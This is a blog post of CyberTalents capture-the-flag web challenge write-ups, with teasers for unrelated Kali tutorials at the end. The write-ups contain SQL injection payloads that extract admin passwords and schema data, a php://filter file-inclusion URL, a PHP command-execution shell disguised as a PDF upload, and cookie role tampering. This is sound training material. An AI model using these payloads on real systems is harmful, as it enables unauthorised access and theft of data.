CYBERTALENTS WEB CHALLENGES WRITEUP

CYBERTALENTS WEB CHALLENGES WRITEUPS


ADMIN HAS THE POWER


So when we open the link we are taken to a login page. I tried admin aas username and admin as password but it didn't go through.


So I decided to take a look at the source code.


```

┌──(you㉿me)-[~]

└─$ curl http://wcamxwl32pue3e6m5p6v4ehxzg1rm2360kxlcg30-web.cybertalentslabs.com                   

<!DOCTYPE html>

<html lang="en">

  <head>

    <meta charset="utf-8">

    <meta http-equiv="X-UA-Compatible" content="IE=edge">

    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->

    <title>Admin Panel</title>


    <!-- Bootstrap -->

    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">


    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->

    <!--[if lt IE 9]>

      <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>

      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>

    <![endif]-->

    <!-- TODO: remove this line ,  for maintenance purpose use this info (user:support password:x34245323)-->

  </head>

  <body>

        <div class="container" style="padding-top   :150px;">

            <div class="row">

                <div class="col-sm-6 col-sm-offset-3">

                                        <form class="form-horizontal" method="post" action="">

                      <div class="form-group">

                        <label for="username" class="col-sm-2 control-label">Username</label>

                        <div class="col-sm-10">

                          <input name="username" type="text" class="form-control" id="username" placeholder="Username">

                        </div>

                      </div>

                      <div class="form-group">

                        <label for="password" class="col-sm-2 control-label">Password</label>

                        <div class="col-sm-10">

                          <input name="password" type="password" class="form-control" id="password" placeholder="Password">

                        </div>

                      </div>


                      <div class="form-group">

                        <div class="col-sm-offset-2 col-sm-10">

                          <button type="submit" class="btn btn-default">Sign in</button>

                        </div>

                      </div>

                    </form>

                                    </div>

            </div>

        </div>

    <!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>

    <!-- Include all compiled plugins (below), or include individual files as needed -->

    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>

    <script>


    </script>

  </body>

</html>

```

We see a user name and password (user:support, password:x34245323) so I gave it a shot.

So after doing soo I logged in but didn't find any flag but we have left a clue.



Here we see a clue that you need better privileges meaning user support has no admin rights. So I took a look at the cookies using the cookie editor extension and I saw a category called role and changed the role to admin.



Bang!! You get the flag.


THIS IS SPARTA

In this challenge were are find ourselves on a login page and now I try the common usernames and passwords but none of them seem to work. So I decided to look at the source code and there it was a javascript obfuscated code, so I decided to decode it using lelinhtinh.github.io/de4js/ and I got the following;





so we see an array of words.


```

var _0xae5b = ["value", "user", "getElementById", "pass", "Cyber-Talent", "                      Congratz \x0A\x0A", "wrong Password"];


function check() {

    var _0xeb80x2 = document[_0xae5b[2]](_0xae5b[1])[_0xae5b[0]];

    var _0xeb80x3 = document[_0xae5b[2]](_0xae5b[3])[_0xae5b[0]];

    if (_0xeb80x2 == _0xae5b[4] && _0xeb80x3 == _0xae5b[4]) {

        alert(_0xae5b[5]);

    } else {

        alert(_0xae5b[6]);

    }

}

```


From this code we can say the following;


```

var _0xeb80x2 = document[getElementById] [user] [value];

var _0xeb80x3 = document[getElementById] [pass] [value];

if (_0xeb80x2 == [pass] && _0xeb80x3 == Cyber-Talent){

    alert(Congratz \x0A\x0A")

}else {

    alert(wrong Password")

}

```


So from here, we see that the username and password should be Cyber-Talent.

When we login in with these credentials we see a pop-up containing the flag.





SHARE THE IDEAS

When we click are taken to a page where we have to log in so that we can be able to comment.


I created an account and logged in. I typed a and it was added to the comments. I added an ' and I got an error and noticed the site was vulnerable to SQL injection. From the error given I noticed it used SQLite


So to get the version of SQLite being used the following payload worked;


```

a' || (select sqlite_version()));--

```


After that, I wanted to know what tables are in the DB,  so I ran the following;


```

a' || (select sql from sqlite_master));--

```


The above showed the following results;




After seeing this, coming up with the final command to give the password was easy;


```

a' || (select password from xde43_users where role="admin"));--

```




DARK PROJECT

On clicking the link we go to a website that at first looks soo normal. On clicking the contact, about and project you notice that nothing is changing. 


So I decided to look at the link and noticed something very fishy;


```

http://wcamxwl32pue3e6m14nzyr6cn3kmm2360kxlcg30-web.cybertalentslabs.com/index.php?home=about

```


So the payload that works is the PHP encode to base64 and it worked like magic.


```

http://wcamxwl32pue3e6m14nzyr6cn3kmm2360kxlcg30-web.cybertalentslabs.com/index.php?home=php://filter/convert.base64-encode/resource=index

```




Since it is in base64 string, I copied the base64 encoded text and went to CyberChef and decode it.





JOIN TEAM

This challenge was a bit tricky but after doing some research I was able to come up with the solution.

We can see that there is a place to upload files but only .pdf files are allowed



So I did the following;


```

──(you㉿me)-[~]

└─$ echo "<?php system('ls'); ?>" >test.txt


┌──(you㉿me)-[~]

└─$ mv test.txt test.pdf


```


I uploaded the test.pdf and magic!! It was successfully uploaded.





So I clicked on the test.pdf and I noticed something at the URL...



I saw the /data/test.pdf so I copied it as follows;


```

data/test.pdf


http://wcamxwl32pue3e6m86dv92kb4zlgm2360kxlcg30-web.cybertalentslabs.com/index.php?jobs and added data/test.pdf and the ls command was executed.

```




I edited the PHP code as follows;


```

<? php system('cat index.php'); ?>

```


After that, we get the flag.


I AM A LEGEND


In this challenge, we are given a login page. I tried the default credentials but couldn't log in.


I took a look at the source code and I saw an obfuscated jsfuck code.



Look at the link below and it'll share some light on how to decode the jsfuck ;). 


cybertalents-iam-legend


WEIRD BLOQ

So this was some weird blog as stated. I went to the search bar and tried searching for a random word but it didn't show any results. I thought for a while and decide to put the search for the following;


```

a || b

```


After searching for it, the following was displayed.



I fuzzed the URL and I got a robots.txt file. I opened the robots.txt file and got a git.phps which was a downloadable file that contained the source code;



After minutes of research I finally found the payload that could get the flag


```

h%a' uNion(sElect(t.cOlumn_name)from(sElect(cOlumn_name),(table_namE)from(infOrmation_schema.COLUMNS)having(table_namE)=('FL@g'))t)#

```


More challenges on the way ;).

Comments

Post a Comment

Popular posts from this blog

SHARING FILES BETWEEN A LINUX AND A WINDOWS MACHINE USING ETHERNET CABLE.

Image
 HOW TO SHARE FILES BETWEEN A LINUX AND A WINDOWS MACHINE USING ETHERNET CABLE In this blog, I will show you step by step how you can share files between a windows machine and a Kali Linux machine. We will start with windows configuration and then go to Linux configuration. WINDOWS CONFIGURATION Go to the search bar and search for the control panel and open it. In the control panel select Network and Internet A new page will be open and select Network and Sharing Center Now connect the ethernet cable in the Linux machine and the windows machine. An Ethernet network connection will appear and you'll click on it. After Clicking on it a pop-up like shown below will show up. On the pop click on the properties button and another pop up will appear. Now on the above pop up look for Internet Protocol Version 4(TCP/IP4)  and select it and after that click on properties. A configuration page will be shown and you'll have to configure it as shown below. ``` 192.168.1.2 ---> This will...
Read more

DROZER IN KALI LINUX 2020.4

HOW TO INSTALL DROZER IN KALI LINUX 2021.4 So the whole last year I have been having trouble installing drozer in Kali Linux without necessarily using it in docker. In this article, I will be showing you how I was able to successfully install drozer in kali Linux 2020.4. First, we have to install pip2.7 in our kali machine which is done by: ``` wget https://bootstrap.pypa.io/pip/2.7/get-pip.py  ``` After doing this we get the get-pip.py in the folder we are in. So we use python2 to install the pip2.7 using the get-pip.py. ``` sudo python2 get-pip.py ``` Use which command to verify whether it is installed: ``` ┌──(you㉿me)-[~/Extracted/Software] └─$ which pip2.7                                      /usr/local/bin/pip2.7 ``` After this we have to wget the drozer whl  from Github: ``` wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl ``` Aft...
Read more

HOW TO INSTALL KALI LINUX

Image
 In this blog, I will show you how to install kali Linux. We will start by understanding Linux. So Linux in a nutshell is basically a family of open-source Unix-like operating systems based on the Linux-Kernel and it was developed by Linus Torvalds in the early 1990s. There are many devices that use the Linux kernel including the android smartphones that most of us use. Linux being open-source means one can see the source code ( unlike others, you can not see their source code) and manipulate it to your own liking. This means having the source code you can add things and remove what is unnecessary according to how you want the operating system to be like. So what you will need for the installation of Kali Linux is; Minimum of 4Gb flash drive Stable internet connection The machine you want to install is kali Linux. Having met the above requirements let's get started. Visit the Kali Linux website ( link to download Kali Linux ) and download the iso file depending on your machine'...
Read more